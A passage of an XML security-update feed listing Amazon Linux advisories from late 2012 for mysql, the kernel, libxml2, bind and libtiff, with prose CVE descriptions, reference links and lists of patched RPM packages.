arch="x86_64"><filename>Packages/libproxy-debuginfo-0.3.0-3.7.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-141</id><title>Amazon Linux - ALAS-2012-141: important priority package update for mysql51</title><issued date="2012-11-20 06:26:00" /><updated date="2014-09-14 17:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1688:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability, related to Server DML.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages, listed in the References section.
814285:
CVE-2012-1688 mysql: unspecified DoS vulnerability related to DML (CPU Apr 2012)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1688" title="" id="CVE-2012-1688" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1462.html" title="" id="RHSA-2012:1462" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql51-bench" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.66" release="1.56.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql51-embedded-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.66-1.56.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2012-142</id><title>Amazon Linux - ALAS-2012-142: medium priority package update for kernel</title><issued date="2012-11-20 06:34:00" /><updated date="2014-09-14 17:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-4565:
871848:
CVE-2012-4565 kernel: net: divide by zero in tcp algorithm illinois
* A divide-by-zero flaw was found in the TCP Illinois congestion control algorithm implementation in the Linux kernel. If the TCP Illinois congestion control algorithm were in use (the sysctl net.ipv4.tcp_congestion_control variable set to "illinois"), a local, unprivileged user could trigger this flaw and cause a denial of service.
CVE-2012-4508:
869904:
CVE-2012-4508 kernel: ext4: AIO vs fallocate stale data exposure
* A race condition in the way asynchronous I/O and fallocate() interacted when using ext4 could allow a local, unprivileged user to obtain random data from a deleted file.
CVE-2012-3511:
Multiple race conditions in the madvise_remove function in mm/madvise.c in the Linux kernel before 3.4.5 allow local users to cause a denial of service (use-after-free and system crash) via vectors involving a (1) munmap or (2) close system call.
849734:
CVE-2012-3511 kernel: mm: use-after-free in madvise_remove()
* A use-after-free flaw was found in the madvise() system call implementation in the Linux kernel. A local, unprivileged user could use this flaw to cause a denial of service or, potentially, escalate their privileges.
CVE-2012-3400:
Heap-based buffer overflow in the udf_load_logicalvol function in fs/udf/super.c in the Linux kernel before 3.4.5 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted UDF filesystem.
843139:
CVE-2012-3400 kernel: udf: buffer overflow when parsing sparing table
* Buffer overflow flaws were found in the udf_load_logicalvol() function in the Universal Disk Format (UDF) file system implementation in the Linux kernel. An attacker with physical access to a system could use these flaws to cause a denial of service or escalate their privileges.
CVE-2012-2133:
Use-after-free vulnerability in the Linux kernel before 3.3.6, when huge pages are enabled, allows local users to cause a denial of service (system crash) or possibly gain privileges by interacting with a hugetlbfs filesystem, as demonstrated by a umount operation that triggers improper handling of quota data.
817430:
CVE-2012-2133 kernel: use after free bug in "quota" handling
* A use-after-free flaw was found in the Linux kernel's memory management subsystem in the way quota handling for huge pages was performed. A local, unprivileged user could use this flaw to cause a denial of service or, potentially, escalate their privileges.
CVE-2012-1568:
804947:
CVE-2012-1568 kernel: execshield: predictable ascii armour base address
* It was found that when running a 32-bit binary that uses a large number of shared libraries, one of the libraries would always be loaded at a predictable address in memory. An attacker could use this flaw to bypass the Address Space Layout Randomization (ASLR) security feature.
CVE-2012-0957:
862877:
CVE-2012-0957 kernel: uts: stack memory leak in UNAME26
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0957" title="" id="CVE-2012-0957" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1568" title="" id="CVE-2012-1568" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2133" title="" id="CVE-2012-2133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3400" title="" id="CVE-2012-3400" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3511" title="" id="CVE-2012-3511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4508" title="" id="CVE-2012-4508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4565" title="" id="CVE-2012-4565" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1426.html" title="" id="RHSA-2012:1426" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.34" release="55.46.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.34-55.46.amzn1.noarch.rpm</filename></package><package name="kernel-devel" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.34" release="55.46.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-headers-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.34-55.46.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-143</id><title>Amazon Linux - ALAS-2012-143: important priority package 
update for libxml2</title><issued date="2012-12-06 21:22:00" /><updated date="2014-09-14 17:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5134:
Heap-based buffer underflow in the xmlParseAttValueComplex function in parser.c in libxml2 2.9.0 and earlier, as used in Google Chrome before 23.0.1271.91, allows remote attackers to cause a denial of service or possibly execute arbitrary code via crafted entities in an XML document.
A heap-based buffer underflow flaw was found in the way libxml2 decoded certain entities. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
880466:
CVE-2012-5134 libxml2: Heap-buffer-underflow in xmlParseAttValueComplex
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5134" title="" id="CVE-2012-5134" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1512.html" title="" id="RHSA-2012:1512" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libxml2-python" version="2.7.8" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.7.8-10.25.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.8" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.7.8-10.25.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.8" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.7.8-10.25.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.8" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.7.8-10.25.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.7.8-10.25.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.8" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.7.8-10.25.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.8" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.7.8-10.25.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.7.8" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.7.8-10.25.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.7.8" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.7.8-10.25.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="10.25.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libxml2-devel-2.7.8-10.25.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-144</id><title>Amazon Linux - ALAS-2012-144: important priority package update for mysql55</title><issued date="2012-12-06 21:24:00" /><updated date="2014-09-14 17:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5611:
Stack-based buffer overflow in MySQL 5.5.19, 5.1.53, and possibly other versions, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
A stack-based buffer overflow flaw was found in the user permission checking code in MySQL. An authenticated database user could use this flaw to crash the mysqld daemon or, potentially, execute arbitrary code with the privileges of the user running the mysqld daemon.
881064:
CVE-2012-5611 mysql: acl_get() stack-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611" title="" id="CVE-2012-5611" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1551.html" title="" id="RHSA-2012:1551" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql55-embedded-devel" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-common" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-common-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.28" release="2.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql55-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-common" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-common-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.28-2.26.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2012-145</id><title>Amazon Linux - ALAS-2012-145: important priority package update for mysql51</title><issued date="2012-12-06 21:25:00" /><updated date="2014-09-14 17:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5611:
Stack-based buffer overflow in MySQL 5.5.19, 5.1.53, and possibly other versions, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
A stack-based buffer overflow flaw was found in the user permission checking code in MySQL. An authenticated database user could use this flaw to crash the mysqld daemon or, potentially, execute arbitrary code with the privileges of the user running the mysqld daemon.
881064:
CVE-2012-5611 mysql: acl_get() stack-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611" title="" id="CVE-2012-5611" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1551.html" title="" id="RHSA-2012:1551" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql51-bench" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.66" release="1.57.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql51-server-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.66-1.57.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2012-146</id><title>Amazon Linux - ALAS-2012-146: important priority package update for bind</title><issued date="2012-12-07 09:28:00" /><updated date="2014-09-14 17:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5688:
ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
A flaw was found in the DNS64 implementation in BIND. If a remote attacker sent a specially-crafted query to a named server, named could exit unexpectedly with an assertion failure. Note that DNS64 support is not enabled by default.
883533:
CVE-2012-5688 bind: DoS on servers using DNS64
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5688" title="" id="CVE-2012-5688" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1549.html" title="" id="RHSA-2012:1549" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind-chroot" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" 
release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-147</id><title>Amazon Linux - ALAS-2012-147: medium priority package update for libtiff</title><issued date="2012-12-20 13:55:00" /><updated date="2014-09-14 17:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5581:
Stack-based buffer overflow in tif_dir.c in LibTIFF before 4.0.2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted DOTRANGE tag in a TIFF image.
A stack-based buffer overflow flaw was found in the way libtiff handled DOTRANGE tags. An attacker could use this flaw to create a specially-crafted TIFF file that, when opened, would cause an application linked against libtiff to crash or, possibly, execute arbitrary code.
867235:
CVE-2012-5581 libtiff: Stack-based buffer overflow when reading a tiled tiff file
CVE-2012-4564:
ppm2tiff does not check the return value of the TIFFScanlineSize function, which allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted PPM image that triggers an integer overflow, a zero-memory allocation, and a heap-based buffer overflow.
A missing return value check flaw, leading to a heap-based buffer overflow, was found in the ppm2tiff tool. An attacker could use this flaw to create a specially-crafted PPM (Portable Pixel Map) file that would cause ppm2tiff to crash or, possibly, execute arbitrary code.
871700:
CVE-2012-4564 libtiff: Missing return value check in ppm2tiff leading to heap-buffer overflow when reading a tiff file
CVE-2012-4447:
Heap-based buffer overflow in tif_pixarlog.c in LibTIFF before 4.0.3 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted TIFF image using the PixarLog Compression format.
A heap-based buffer overflow flaw was found in the way libtiff processed certain TIFF images using the Pixar Log Format encoding. An attacker could create a specially-crafted TIFF file that, when opened, could cause an application using libtiff to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
860198:
CVE-2012-4447 libtiff: Heap-buffer overflow when processing a TIFF image with PixarLog Compression
CVE-2012-3401:
The t2p_read_tiff_init function in tiff2pdf (tools/tiff2pdf.c) in LibTIFF 4.0.2 and earlier does not properly initialize the T2P context struct pointer in certain error conditions, which allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted TIFF image that triggers a heap-based buffer overflow.
A heap-based buffer overflow flaw was found in the tiff2pdf tool. An attacker could use this flaw to create a specially-crafted TIFF file that would cause tiff2pdf to crash or, possibly, execute arbitrary code.
837577:
CVE-2012-3401 libtiff (tiff2pdf): Heap-based buffer overflow due to improper initialization of T2P context struct pointer
